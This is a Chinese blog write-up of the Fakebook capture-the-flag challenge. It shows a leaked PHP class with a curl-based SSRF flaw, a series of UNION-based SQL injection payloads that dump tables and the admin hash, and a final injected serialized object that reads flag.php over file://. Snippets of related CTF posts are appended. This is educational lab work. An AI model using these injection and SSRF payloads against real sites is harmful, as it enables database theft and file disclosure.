[WP/BUU/SSRF/SQLI/反序列化] [网鼎杯 2018]Fakebook解题+分析

最新推荐文章于 2024-09-24 11:08:06 发布
最新推荐文章于 2024-09-24 11:08:06 发布
阅读量281 收藏
点赞数 1
分类专栏: # Write Up # 凌晨四点起床刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darknotes/article/details/119265092
版权

[网鼎杯 2018]Fakebook

扫描测试,robots.txt 可读

User-agent: *
Disallow: /user.php.bak

下载,源代码展示了UserInfo类,

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

发现疑似SSRF,猜测可以加载文件并显示在blog展示区,

同时,在view发现注入,

view.php?no=

-1/**/union/**/select/**/1,database(),3,4%23
facebook

-1/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema=database()%23
users

-1/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name='users'%23
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

-1/**/union/**/select/**/1,group_concat(concat('[',username,',',passwd,',',data,']')),3,4/**/from/**/users%23
[admin,ba3253876aed6bc22d4a6ff53d8406c6ad864195ed144ab5c87621b6c233b548baeae6956df346ec8c17f5ea10f35ee3cbc514797ed7ddd3145464e2a0bab413,O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:12:"www.blog.com";}]

爆库结果展示了反序列化的关键信息

<?php

class UserInfo
{
    public $name = "admin";
    public $age = 123;
    public $blog = "file://var/www/html/flag.php";
}
# O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:28:"file://var/www/html/flag.php";}

正常逻辑下,data传入的也是序列化对象,显示的是对应URL的iframe窗口,说明view的后台函数调用了User类,获取4号位数据,执行了反序列化,触发了curl。因此我们传入伪造了资源位置的URL,使之回显,那么curl的便是指定的资源。

借由上述思想,我们上传payload,

-1/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'/**/from/**/users%23
車鈊
关注
专栏目录
【网络安全 | CTF】fakebook网鼎杯2018解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
【学习笔记 28】 buu [网鼎杯 2018]Fakebook
weixin_43553654的博客
07-28 343
0x00 知识点 robots.txt文件泄露 SSRF(服务器端请求伪造) 多种SQL注入以及绕过 构造序列化字符串 0x01 知识点详解 什么是SSRF? 答:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 详情推荐去看这个大佬的文章 什么是序列化,什么是反序列化? 这
BUUCTF [第二章 web进阶]SSRF Training1
sinat_41572027的博客
06-25 596
BUUCTF [第二章 web进阶]SSRF Training1 1.尝试输入正确URL,能正常跳转2.查看网页源码,发现challenge.php网页3.进入challenge.php,学习源码 4.构造payload 绕过parse_url() 5.成功绕过后,访问flag.php 获得flag 便捷方法:在url栏输入http://127.0.0.1/flag.php 即可成功访问...
fakebook--2018网鼎杯--攻防世界wp
4pri1
01-29 284
fakebook2018网鼎杯 刚打开的样子 登录不行,先注册。 同时用burp suite 抓包 发现异常包robot.txt 查看后发现存在泄漏 进入下载文件并查看 注册后登录,发现将no=不存在的值会报错 结合user.php.bak发现存在get注入并且可以找到资源的物理路径 用 order by查询字段 当字段为4 返回值正常 查询数据库名 http://220.249.52.134:51172/view.php?no=-6%20union/**/select%201,grou
BUUCTF [第二章 web进阶]SSRF Training
最新发布
weixin_43520214的博客
09-24 1183
SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种网络攻击,攻击者通过欺骗服务器,使其向本不该访问的内部或外部资源发出 HTTP 请求。这种攻击允许攻击者间接利用服务器发起请求,绕过防火墙、访问内网系统,甚至读取本地资源。SSRF 攻击的基本概念:在 SSRF 攻击中,攻击者并不直接访问目标资源,而是通过服务器充当代理来发起请求。
BUU [第二章 web进阶]SSRF Training
qq_62078839的博客
04-18 1922
打开连接发现页面上提示了flag.php,那么flag应该就放在这里了,点开intersting challenge 出现源码,审计代码 <?php highlight_file(__FILE__); function check_inner_ip($url) { $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { ...
[BUU/SSRF] [De1CTF 2019]SSRF Me
車鈊的博客
10-14 310
[De1CTF 2019]SSRF Me 初审 整理源代码 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json # reload(sys) # sys.setdefaultencoding('latin1') app = Fla
Buu-第二届网鼎杯_玄武组web_ssrfme
Fisher
06-08 1229
<?php function check_inner_ip($url) { $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); if (!$match_result) { die('url fomat error'); } try { $url_parse=parse_url($url); } catch
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
buu-[网鼎杯 2018]Comment
qaq517384的博客
10-13 335
进入题目 发帖时提示要登录,密码用bp跑出来是666 然后这个发帖形式很像上一题的二次注入,先构造sql语句,后面在留言界面输出 稍微试了一下,有问题的都发不出留言 在f12控制台发现这样一句话后,在url后添加.git被403禁止了,说明有git泄露 githack载下来的源码跟没载一样 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./l
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
ssrf刷题——buu [第二章 web进阶]SSRF Training [网鼎杯 2020 玄武组]SSRFMe
m0_73756016的博客
05-28 1555
需要用到的工具。
【学习笔记12】buu [De1CTF 2019]SSRF Me
weixin_43553654的博客
05-12 369
打开后看到一堆代码,根本看不懂,不过还好题目上给出了源码的下载位置,并且提示flag is in ./flag.txt,那啥都都不说了,先把源码下载下来吧。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashl...
buu(ssti模板注入、ssrf服务器请求伪造)
qq_62046696的博客
08-19 988
搜索一下,shtml的信息,补充一下什么是ssi注入,SSI 注入全称Server-Side Includes Injection(服务端包含注入),ssi可以赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,当在网站目录中发现了.stm .shtm .shtml或在界面中发现了。到这分析结束,我们只要绕过checkSign,让返回的值相同就可以了,可是secret这个密钥我们不知道值呀,仔细看第一个目录就可以明白。打开界面源码,什么都没有发现,试一下万能密码之类的登录,只返回fail。.
buuctf[第二章 web进阶]SSRF Training 1
m0_52299173的博客
07-08 901
[第二章 web进阶]SSRF Training 1
网鼎杯第三场wp
weixin_30477293的博客
08-27 1017
晚上十点更新 十点:https://www.o2oxy.cn/1753.html 转载于:https://www.cnblogs.com/liang2580/p/9543706.html
BUUCTF WEB SSRF(下)(FastCGI协议)
wwwwyyyrre的博客
04-18 281
index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对)我这里提供的是第二种方法 提供一个php文件的绝对路径 在看他的根目录 找到flag的文件 在进行读取。这里的php文件的绝对路径我用的是var/www/html/index.php。PHP-FPM监听在本机9000端口(题目环境已满足)知道题目环境中的一个PHP文件的绝对路径。
BUU刷题 [网鼎杯 2020 玄武组]SSRFMe
weixin_48631429的博客
01-24 571
直接给了源码,提示本地访问hint.php DNS重绑定漏洞察看hint.php: url=http://0.0.0.0/hint.php 提示redispass is root ssrf 打redis。 直接利用工具 https://github.com/xmsec/redis-ssrf https://github.com/n0b0dyCN/redis-rogue-server 将ssrf-redis.py中的对应位置更改 将下面的exp.so和上面的rogue-server.py,ssrf-red
阈下质子-核碰撞中Λ/Σ生成的各向异性影响:Ξ重数研究
研究采用了一种基于BUU(玻尔兹曼-尿素模型)的运输模型,这是一种在高能物理中常用的量子统计动力学模型,用于模拟粒子在非平衡条件下的行为。在这个模型框架下,作者关注的是亚阈值能量下,即低于产生相应粒子所...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值